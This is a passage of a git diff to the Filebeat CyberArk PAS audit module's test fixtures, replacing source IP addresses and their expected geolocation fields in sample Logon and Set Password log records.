-            "37.223.7.45"
+            "216.160.83.61"
         ],
         "related.user": [
             "Administrator"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "37.223.7.45",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "37.223.7.45",
+        "source.address": "216.160.83.61",
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.61",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -491,7 +488,7 @@
         "cyberarkpas.audit.message": "Logon",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:48",
         "event.action": "authentication_success",
         "event.category": [
@@ -511,29 +508,26 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 5456,
+        "log.offset": 5457,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "PSMP_ADB_localhost.localdomain"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -549,7 +543,7 @@
         "cyberarkpas.audit.message": "Logon",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:48",
         "event.action": "authentication_success",
         "event.category": [
@@ -576,22 +570,19 @@
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "PSMPApp_localhost.localdomain"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -607,7 +598,7 @@
         "cyberarkpas.audit.message": "Logon",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:49",
         "event.action": "authentication_success",
         "event.category": [
@@ -627,29 +618,26 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 6571,
+        "log.offset": 6570,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "PSMPGW_localhost.localdomain"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/88_set_password.log b/x-pack/filebeat/module/cyberarkpas/audit/test/88_set_password.log
index 308e66ee8c0c..8cd028024f4a 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/88_set_password.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/88_set_password.log
@@ -3,16 +3,16 @@
 Mar 08 02:54:46 VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"no","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PVWAGWUser","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}}
 <5>1 2021-03-10T08:29:19Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 00:29:19","IsoTimestamp":"2021-03-10T08:29:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"Prov_COMPONENTS","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}}
 <5>1 2021-03-10T08:29:28Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 00:29:28","IsoTimestamp":"2021-03-10T08:29:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PasswordManager","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:52Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:52","IsoTimestamp":"2021-03-10T09:11:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:52Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:52","IsoTimestamp":"2021-03-10T09:11:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPGW_localhost.localdomain","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:55Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:55","IsoTimestamp":"2021-03-10T09:11:55Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMP_ADB_localhost.localdomain","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}}
-<5>1 2021-03-10T18:46:47Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:47","IsoTimestamp":"2021-03-10T18:46:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}}
-<5>1 2021-03-10T18:46:47Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:47","IsoTimestamp":"2021-03-10T18:46:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMGw_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}}
-<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}}
-<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMGw_ASR-WIN","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}}
-<5>1 2021-03-11T16:59:54Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:59:54</Timestamp>\n    <IsoTimestamp>2021-03-11T16:59:54Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>88</MessageID>\n    <Desc>Set Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_VAGRANT</Issuer>\n    <Action>Set Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Set Password</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:54","IsoTimestamp":"2021-03-11T16:59:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}}
-<5>1 2021-03-11T16:59:55Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:59:55</Timestamp>\n    <IsoTimestamp>2021-03-11T16:59:55Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>88</MessageID>\n    <Desc>Set Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPGW_VAGRANT</Issuer>\n    <Action>Set Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Set Password</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:55","IsoTimestamp":"2021-03-11T16:59:55Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPGW_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}}
-<5>1 2021-03-11T20:10:33Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 12:10:33</Timestamp>\n    <IsoTimestamp>2021-03-11T20:10:33Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>88</MessageID>\n    <Desc>Set Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMApp_ASR-WIN</Issuer>\n    <Action>Set Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>34.66.114.180</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Set Password</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:10:33","IsoTimestamp":"2021-03-11T20:10:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"34.66.114.180","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}}
-<5>1 2021-03-14T12:57:25Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:25</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:25Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>88</MessageID>\n    <Desc>Set Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPGW_SSH</Issuer>\n    <Action>Set Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Set Password</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:25","IsoTimestamp":"2021-03-14T12:57:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPGW_SSH","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}}
-<5>1 2021-03-14T12:57:25Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:25</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:25Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>88</MessageID>\n    <Desc>Set Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_SSH</Issuer>\n    <Action>Set Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Set Password</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:25","IsoTimestamp":"2021-03-14T12:57:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPApp_SSH","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}}
-<5>1 2021-03-14T12:57:25Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:25</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:25Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>88</MessageID>\n    <Desc>Set Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMP_ADB_asr-cyberark-psm-ssh</Issuer>\n    <Action>Set Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Set Password</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:25","IsoTimestamp":"2021-03-14T12:57:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMP_ADB_asr-cyberark-psm-ssh","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:52Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:52","IsoTimestamp":"2021-03-10T09:11:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:52Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:52","IsoTimestamp":"2021-03-10T09:11:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPGW_localhost.localdomain","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:55Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:55","IsoTimestamp":"2021-03-10T09:11:55Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMP_ADB_localhost.localdomain","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}}
+<5>1 2021-03-10T18:46:47Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:47","IsoTimestamp":"2021-03-10T18:46:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}}
+<5>1 2021-03-10T18:46:47Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:47","IsoTimestamp":"2021-03-10T18:46:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMGw_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}}
+<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.12","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}}
+<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMGw_ASR-WIN","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.12","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}}
+<5>1 2021-03-11T16:59:54Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:59:54</Timestamp>\n    <IsoTimestamp>2021-03-11T16:59:54Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>88</MessageID>\n    <Desc>Set Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_VAGRANT</Issuer>\n    <Action>Set Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Set Password</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:54","IsoTimestamp":"2021-03-11T16:59:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}}
+<5>1 2021-03-11T16:59:55Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:59:55</Timestamp>\n    <IsoTimestamp>2021-03-11T16:59:55Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>88</MessageID>\n    <Desc>Set Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPGW_VAGRANT</Issuer>\n    <Action>Set Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Set Password</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:55","IsoTimestamp":"2021-03-11T16:59:55Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPGW_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}}
+<5>1 2021-03-11T20:10:33Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 12:10:33</Timestamp>\n    <IsoTimestamp>2021-03-11T20:10:33Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>88</MessageID>\n    <Desc>Set Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMApp_ASR-WIN</Issuer>\n    <Action>Set Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Set Password</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:10:33","IsoTimestamp":"2021-03-11T20:10:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}}
